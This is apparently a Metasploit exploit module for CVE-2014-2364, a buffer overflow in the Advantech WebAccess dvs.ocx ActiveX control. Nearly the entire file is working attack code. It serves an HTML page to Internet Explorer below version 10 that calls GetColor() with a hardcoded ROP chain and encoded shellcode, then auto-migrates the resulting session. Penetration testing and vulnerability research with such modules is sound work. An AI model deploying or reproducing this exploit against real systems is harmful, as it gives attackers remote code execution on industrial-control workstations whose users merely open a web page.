require
'msf/core'
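class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Browser exploit for the Advantech WebAccess dvs.ocx ActiveX control
  # (CVE-2014-2364): an unchecked sprintf reachable through GetColor().
  #
  # The served page instantiates the control by CLSID and calls GetColor()
  # with a string that carries the stack layout built by #rop_payload:
  # filler, a ROP chain of dvs.ocx addresses (image base presumably
  # 0x60000000 — not verifiable from this file) and the encoded payload.
  # Only IE < 10 on Windows is targeted (see BrowserRequirements).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows 7
        SP1 with IE8 and IE 9.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',
          'juan vazquez'
        ],
      'References'     =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions' =>
        {
          'Retries'              => false,
          # Leave the crashed IE process behind as soon as the session is up.
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          # IE 10+ is excluded; the chain relies on a fixed module base.
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
          # The control must be present and scriptable; the server probes for
          # this CLSID/method pair before sending the exploit.
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload'        =>
        {
          'Space'          => 1024,
          'DisableNops'    => true,
          # NUL, CR and LF terminate the sprintf'd string / HTML line; the
          # backslash would act as a JS string escape inside GetColor("...").
          'BadChars'       => "\x00\x0a\x0d\x5c",
          # add esp, -0x64 : move ESP below the decoder stub before it runs.
          'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff",
          # mov eax, fs:[0x18]   ; TEB self pointer
          # add eax, 8           ; NT_TIB.StackBase (presumed)
          # mov esp, [eax]       ; pivot ESP to the top of the thread stack
          # add esp, -0x7d0      ; then back off 2000 bytes of headroom
          'Prepend'        => "\x64\xa1\x18\x00\x00\x00" +
                              "\x83\xC0\x08" +
                              "\x8b\x20" +
                              "\x81\xC4\x30\xF8\xFF\xFF"
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 17 2014'
    ))
  end

  # Serve the exploit page to a browser that passed the requirement checks.
  #
  # @param cli          [Rex::Proto::Http::ServerClient] the connected browser
  # @param request      [Rex::Proto::Http::Request] the request being answered
  # @param target_info  [Hash] profile collected by BrowserExploitServer
  #
  # The trigger is a single GetColor() call whose first argument is the
  # escaped output of #rop_payload; the second argument (0) is opaque here.
  # The meta tags only defeat caching so a retry fetches a fresh payload.
  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")

    trigger = rop_payload(get_payload(cli, target_info))

    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{trigger}", 0);
</script>
</body>
</html>
    EOS

    print_status("Sending #{self.name}")
    send_response_html(cli, content, { 'Pragma' => 'no-cache' })
  end

  # Build the GetColor() argument: 61 bytes of filler up to the saved return
  # address, a ROP chain of dvs.ocx addresses, and the payload, escaped so it
  # can sit inside a double-quoted JavaScript string literal.
  #
  # @param code [String] the encoded payload (must honour BadChars)
  # @return [String] the JS-string-safe exploit buffer
  #
  # What the individual gadgets do is not recoverable from this file; the
  # layout below is reproduced as-is. 0xffffffff values are presumably
  # arguments consumed by the preceding gadget, the 0x41 repetitions of
  # 0x6001b8ec look like a return sled, and the 4-byte random words are
  # slots whose content is irrelevant — TODO confirm against dvs.ocx.
  def rop_payload(code)
    dword = lambda { |v| [v].pack("V") }
    junk  = lambda { |len| rand_text_alphanumeric(len) }

    chain = ''
    chain << junk.call(61)
    chain << dword.call(0x60014185)
    chain << junk.call(8)
    chain << dword.call(0x60012288)
    chain << dword.call(0xffffffff)
    chain << dword.call(0x6002157e)
    chain << dword.call(0x9ffdafc9)
    chain << dword.call(0x60022b97)
    chain << dword.call(0x60024ea4)
    chain << dword.call(0x60018084)
    4.times { chain << junk.call(4) }
    chain << dword.call(0x60029f6c)
    chain << dword.call(0x60012288)
    chain << dword.call(0x60023588)
    chain << dword.call(0x6001f1c8)
    chain << dword.call(0x60012288)
    chain << dword.call(0xffffffff)
    chain << dword.call(0x6002157e)
    chain << dword.call(0x9ffdbf89)
    chain << dword.call(0x60022b97)
    chain << dword.call(0x60024ea4)
    chain << dword.call(0x6002157e)
    4.times { chain << junk.call(4) }
    chain << dword.call(0x60029f6c)
    chain << dword.call(0x60012288)
    chain << dword.call(0xffffffff)
    0x41.times { chain << dword.call(0x6001b8ec) }
    [
      0x6001db7e, 0x600250c8, 0x6002054b, 0x6002054b, 0x600181cc,
      0x6002176e, 0x60021ad1, 0x60021ad2, 0x60018399, 0x6001c5cd
    ].each { |gadget| chain << dword.call(gadget) }
    chain << code

    # Escape for a double-quoted JS string. Two things matter here:
    #  * backslashes must be doubled BEFORE quotes are escaped, otherwise the
    #    backslash inserted for \" would itself be doubled and re-open the
    #    string literal;
    #  * the block form is required: with a String replacement, gsub
    #    interprets "\\\\" as a single backslash, so the original
    #    gsub!("\\", "\\\\") was a silent no-op.
    # 0x5c is also a BadChar, so a correctly encoded payload never hits the
    # first rule; this is defence in depth for the chain/junk bytes.
    chain.gsub!("\\") { "\\\\" }
    chain.gsub!("\"") { "\\\"" }

    chain
  end
end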